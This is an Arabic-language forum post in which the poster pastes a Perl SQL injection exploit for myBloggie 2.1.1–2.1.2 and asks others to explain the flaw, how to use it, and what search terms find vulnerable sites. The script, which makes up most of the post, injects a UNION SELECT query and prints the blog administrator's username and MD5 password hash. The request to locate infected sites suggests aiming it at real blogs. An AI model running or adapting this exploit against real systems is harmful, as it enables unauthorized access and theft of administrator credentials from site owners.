و لكنى اطلب من الأخوة الأساتذة ان يشرحوا لى و للأعضاء ان امكن ----
نوع تلك الثغرة ---- كيفية استخدامها --- كلمات البحث عن المواقع المصابة
و ارجو الا ترجعونى الى قسم الأجهزة بخفى حنين
اترككم مع الثغرة
myBloggie 2.1.1 - 2.1.2 SQL Injection Exploit
-------------------------------------------------------- #!/usr/bin/perl -w # # SQL Injection Exploit for myBloggie 2.1.1 - 2.1.2 # This exploit show the username of the administrator of the blog and his password crypted in MD5 use LWP::Simple;
print "\n\t=======================================\n"; print "\t= Exploit for myBloggie 2.1.1 - 2.1.2 =\n"; print "\t= Alberto Trivero - codebug.org =\n"; print "\t=======================================\n\n";
if(!$ARGV[0] or !($ARGV[0]=~/http/) or !$ARGV[1] or ($ARGV[1] ne '2.1.1' and $ARGV[1] ne '2.1.2')) { print "Usage:\nperl $0 [full_target_path] [version: 2.1.1 OR 2.1.2]\n\nExample:\nperl $0 http://www.example.com/mybloggie/ 2.1.1\n"; exit(0); }
$url=q[index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%20null,null,null,null,u ser,password,null,null,null,null%20FROM%20blog_use r/*]; $page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!"; print "[+] Connected to: $ARGV[0]\n"; if($ARGV[1] eq '2.1.1') { $page=~m/<tr><td colspan="3" class="subject">(.*?)<\/td><\/tr>/ && print "[+] Username of administrator is: $1\n"; print "[-] Unable to retrieve username\n" if(!$1); } else { $page=~m/<img src="templates\/aura\/images\/permalink.gif" border="0" title="Permalink"><\/a> (.*?)<\/td><\/tr>/ && print "[+] Username of administrator is: $1\n"; print "[-] Unable to retrieve username\n" if(!$1); } $page=~m/<tr><td colspan="3" class="message">(.*?)<\/td><\/tr>/ && print "[+] MD5 hash of password is: $1\n"; print "[-] Unable to retrieve hash of password\n" if(!$1); ----------------------------------------------------------------------------- ها ؟